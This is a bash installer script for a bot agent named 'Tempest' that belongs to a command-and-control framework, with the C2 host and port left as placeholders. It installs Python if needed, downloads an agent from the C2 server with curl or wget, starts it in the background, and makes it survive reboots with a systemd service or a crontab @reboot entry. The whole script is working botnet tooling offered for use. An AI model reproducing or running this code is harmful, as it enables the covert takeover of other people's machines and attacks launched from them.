#!/usr/bin/env bash
# Tempest 1.0 — Bot Agent Installer
# Auto-detects OS, installs Python if needed, downloads agent, runs as background service
# Generated by C2: __C2_HOST__:__C2_PORT__
set -e

C2_HOST="__C2_HOST__"
C2_PORT="__C2_PORT__"
C2_BASE="http://${C2_HOST}:${C2_PORT}"
AGENT_FILE="$HOME/.l7agent/agent.py"
AGENT_DIR="$HOME/.l7agent"

echo "[*] L7 Agent Installer"
echo "[*] C2: ${C2_BASE}"

# ── Create working dir ────────────────────────────────────────────────────────
mkdir -p "$AGENT_DIR"

# ── Detect Python ─────────────────────────────────────────────────────────────
PY=""
for cmd in python3 python python3.12 python3.11 python3.10 python3.9; do
    if command -v "$cmd" &>/dev/null; then
        ver=$("$cmd" -c "import sys; print(sys.version_info[:2])" 2>/dev/null)
        if [[ "$ver" > "(3, 6)" ]]; then
            PY="$cmd"
            echo "[+] Found: $(command -v $cmd)"
            break
        fi
    fi
done

# ── Install Python if missing ─────────────────────────────────────────────────
if [[ -z "$PY" ]]; then
    echo "[!] Python 3 not found — attempting install..."
    OS="$(uname -s)"
    if [[ "$OS" == "Linux" ]]; then
        if command -v apt-get &>/dev/null; then
            sudo apt-get update -qq && sudo apt-get install -y python3 python3-pip
        elif command -v dnf &>/dev/null; then
            sudo dnf install -y python3
        elif command -v yum &>/dev/null; then
            sudo yum install -y python3
        elif command -v pacman &>/dev/null; then
            sudo pacman -Sy --noconfirm python
        elif command -v apk &>/dev/null; then
            apk add --no-cache python3
        else
            echo "[!] Cannot auto-install Python. Install manually: https://python.org"
            exit 1
        fi
    elif [[ "$OS" == "Darwin" ]]; then
        if command -v brew &>/dev/null; then
            brew install python3
        else
            echo "[!] Install Homebrew first: https://brew.sh — then re-run this script"
            exit 1
        fi
    else
        echo "[!] Unsupported OS: $OS"
        exit 1
    fi
    PY="python3"
fi

echo "[+] Using Python: $($PY --version)"

# ── Download agent ────────────────────────────────────────────────────────────
echo "[*] Downloading agent from C2..."
if command -v curl &>/dev/null; then
    curl -sfL "${C2_BASE}/api/agent/generate?host=${C2_HOST}&port=${C2_PORT}" -o "$AGENT_FILE"
elif command -v wget &>/dev/null; then
    wget -qO "$AGENT_FILE" "${C2_BASE}/api/agent/generate?host=${C2_HOST}&port=${C2_PORT}"
else
    echo "[!] Neither curl nor wget found. Install curl and re-run."
    exit 1
fi

echo "[+] Agent saved to $AGENT_FILE"

# ── Start immediately ─────────────────────────────────────────────────────────
echo "[*] Starting agent..."
nohup "$PY" "$AGENT_FILE" >> "$AGENT_DIR/agent.log" 2>&1 &
echo "[+] Agent running (PID $!)"

# ── Persist across reboots ────────────────────────────────────────────────────
CRON_CMD="@reboot $PY $AGENT_FILE >> $AGENT_DIR/agent.log 2>&1"

# Try systemd first (Linux)
if command -v systemctl &>/dev/null && [[ "$(uname -s)" == "Linux" ]]; then
    SERVICE_FILE="/etc/systemd/system/l7agent.service"
    cat > /tmp/l7agent.service <<EOF
[Unit]
Description=Tempest Agent
After=network.target

[Service]
ExecStart=$PY $AGENT_FILE
Restart=always
RestartSec=10
StandardOutput=append:$AGENT_DIR/agent.log
StandardError=append:$AGENT_DIR/agent.log

[Install]
WantedBy=multi-user.target
EOF
    if sudo mv /tmp/l7agent.service "$SERVICE_FILE" 2>/dev/null; then
        sudo systemctl daemon-reload
        sudo systemctl enable l7agent
        sudo systemctl start l7agent
        echo "[+] Installed as systemd service (l7agent)"
    else
        # No sudo — fall back to cron
        (crontab -l 2>/dev/null | grep -v l7agent; echo "$CRON_CMD") | crontab -
        echo "[+] Added to crontab (@reboot)"
    fi
else
    # macOS or no systemd — use cron
    (crontab -l 2>/dev/null | grep -v l7agent; echo "$CRON_CMD") | crontab -
    echo "[+] Added to crontab (@reboot)"
fi

echo ""
echo "[+] Installation complete."
echo "    Agent ID stored in: $AGENT_DIR/.agent_id"
echo "    Logs: $AGENT_DIR/agent.log"
echo "    C2:   ${C2_BASE}"
